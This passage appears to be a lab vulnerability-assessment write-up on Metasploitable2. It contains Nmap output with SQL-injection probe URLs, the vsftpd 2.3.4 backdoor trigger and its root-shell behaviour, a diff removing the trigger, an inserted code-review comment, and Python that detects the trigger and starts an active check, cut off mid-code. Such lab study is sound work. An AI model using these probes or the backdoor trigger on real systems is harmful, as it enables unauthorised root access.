    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |   Possible sqli for forms:
    |     Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |       choice
    |_      initials
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-trace: TRACE is enabled
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    | rmi-vuln-classloader: 
    |   VULNERABLE:
    |   RMI registry default configuration remote code execution vulnerability
    |     State: VULNERABLE
    |       Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
    |       
    |     References:
    |_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    |_ssl-ccs-injection: No reply from server (TIMEOUT)
    |_sslv2-drown: 
    5432/tcp open  postgresql
    | ssl-ccs-injection: 
    |   VULNERABLE:
    |   SSL/TLS MITM vulnerability (CCS Injection)
    |     State: VULNERABLE
    |     Risk factor: High
    |       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
    |       does not properly restrict processing of ChangeCipherSpec messages,
    |       which allows man-in-the-middle attackers to trigger use of a zero
    |       length master key in certain OpenSSL-to-OpenSSL communications, and
    |       consequently hijack sessions or obtain sensitive information, via
    |       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
    |           
    |     References:
    |       http://www.openssl.org/news/secadv_20140605.txt
    |       http://www.cvedetails.com/cve/2014-0224
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: 
    5900/tcp open  vnc
    |_sslv2-drown: 
    6000/tcp open  X11
    6667/tcp open  irc
    |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
    8009/tcp open  ajp13
    8180/tcp open  unknown
    | http-cookie-flags: 
    |   /admin/: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/index.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/home.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/controlpanel.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin-login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/cp.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/account.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/admin_login.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/adminLogin.jsp: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
    |     JSESSIONID: 
    |       httponly flag not set
    |   /admin/jscript/upload.html: 
    |     JSESSIONID: 
    |_      httponly flag not set
    | http-enum: 
    |   /admin/: Possible admin folder
    |   /admin/index.html: Possible admin folder
    |   /admin/login.html: Possible admin folder
    |   /admin/admin.html: Possible admin folder
    |   /admin/account.html: Possible admin folder
    |   /admin/admin_login.html: Possible admin folder
    |   /admin/home.html: Possible admin folder
    |   /admin/admin-login.html: Possible admin folder
    |   /admin/adminLogin.html: Possible admin folder
    |   /admin/controlpanel.html: Possible admin folder
    |   /admin/cp.html: Possible admin folder
    |   /admin/index.jsp: Possible admin folder
    |   /admin/login.jsp: Possible admin folder
    |   /admin/admin.jsp: Possible admin folder
    |   /admin/home.jsp: Possible admin folder
    |   /admin/controlpanel.jsp: Possible admin folder
    |   /admin/admin-login.jsp: Possible admin folder
    |   /admin/cp.jsp: Possible admin folder
    |   /admin/account.jsp: Possible admin folder
    |   /admin/admin_login.jsp: Possible admin folder
    |   /admin/adminLogin.jsp: Possible admin folder
    |   /manager/html/upload: Apache Tomcat (401 Unauthorized)
    |   /manager/html: Apache Tomcat (401 Unauthorized)
    |   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
    |   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
    |   /admin/jscript/upload.html: Lizard Cart/Remote File upload
    |_  /webdav/: Potentially interesting folder
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    
    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: false
    |_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
    
    Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    

    The output above lists the vulnerabilities that Nmap's vuln scripts found on the target.

    From here on we concentrate on one of them, the backdoor in the FTP service (vsftpd), whose relevant lines from the scan are:



    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |_sslv2-drown: 
    
    
    



    The attack Procedure


    The Metasploit module's description (shown further down) records that this is not a coding bug in vsftpd but a trojaned download: the backdoor was added to the official vsftpd-2.3.4.tar.gz archive between June 30th and July 1st 2011 and removed on July 3rd 2011.

    The attack against vsftpd 2.3.4 is therefore simply to send the trigger sequence to the FTP service; the trojaned code then opens a backdoor listener on TCP port 6200 of the system that hands out a root shell.



    Let's Exploit


    The following snippet of the backdoored source (the lines the upstream fix removed, hence the leading minus signs) makes things much clearer:



    -    else if((p_str->p_buf[i]==0x3a)
    -    && (p_str->p_buf[i+1]==0x29))
    -    {
    -      vsf_sysutil_extra();
    -    }
       }
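    Review bot: this hunk deletes only the call site; vsf_sysutil_extra() itself, the function that binds port 6200 and execs /bin/sh, is not touched by these lines, so the same change should also drop that definition rather than leave dead backdoor code in the tree. Worth recording as well: the deleted condition reads p_str->p_buf[i+1] with no bound on i+1 visible in the hunk, so besides acting as a trigger the scan could read one byte past the end of a buffer whose last byte is ':'.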
    



     

    We can clearly see that if two consecutive bytes in the network buffer match the backdoor sequence 0x3a (':') followed by 0x29 (')'), that is the smiley ":)", the malicious function vsf_sysutil_extra() is called.

    Furthermore, if we look at the definition of that function, we can see what it does:




    Click Here For More Info - https://pastebin.com/AetT9sS5




    sa.sin_port = htons(6200) makes port 6200 the backdoor port: the function binds that port, accepts a connection, duplicates the accepted socket onto stdin, stdout and stderr, and then calls execl("/bin/sh","sh",(char *)0), so everything sent to the port is executed by a shell. Because vsftpd runs this code in its privileged process, the shell is root, which is exactly what the UID line of the Metasploit output below confirms.
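    As an added example (not code from the original write-up, from vsftpd or from Metasploit), the Python below models the trigger check described above, runs it over a few constructed FTP log lines the way a detection rule would, and includes an active check that does what Nmap's ftp-vsftpd-backdoor script and the Metasploit module do: send a USER containing ":)", then see whether TCP/6200 starts accepting connections. The target host, the log line format and the probe username are assumptions; the active check spawns the backdoor listener on a trojaned server, so run it only against systems in scope.

```python
"""vsftpd 2.3.4 backdoor: trigger model, log detection and active check.
Added example, not from the original write-up. Target/port values assumed."""
import re
import socket
import sys

BACKDOOR_PORT = 6200   # port bound by the trojaned vsf_sysutil_extra()
TRIGGER = b":)"        # bytes 0x3a 0x29, the pair the leaked check looks for


def has_backdoor_trigger(buf: bytes) -> bool:
    """Python mirror of the removed C check: True if byte 0x3a (':') is
    immediately followed by byte 0x29 (')') anywhere in the buffer."""
    for i in range(len(buf) - 1):
        if buf[i] == 0x3A and buf[i + 1] == 0x29:
            return True
    return False


# Constructed log lines in an assumed "<client> <COMMAND> <argument>" format.
SAMPLE_FTP_LOG = [
    "192.168.43.10 USER alice",
    "192.168.43.152 USER x2Fa:)",      # trigger: ':' then ')'
    "192.168.43.152 PASS hunter2",
    "192.168.43.11 USER bob:-)",       # ':' then '-': not the trigger
]


def find_trigger_attempts(log_lines):
    """Return (line_no, client, username) for each USER command whose
    argument carries the trigger. Adapt the regex to your own FTP/IDS logs."""
    user_cmd = re.compile(r"^(?P<client>\S+) USER (?P<name>.*)$")
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = user_cmd.match(line)
        if m and has_backdoor_trigger(m.group("name").encode()):
            hits.append((n, m.group("client"), m.group("name")))
    return hits


def _accepts(host, port, timeout):
    """True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


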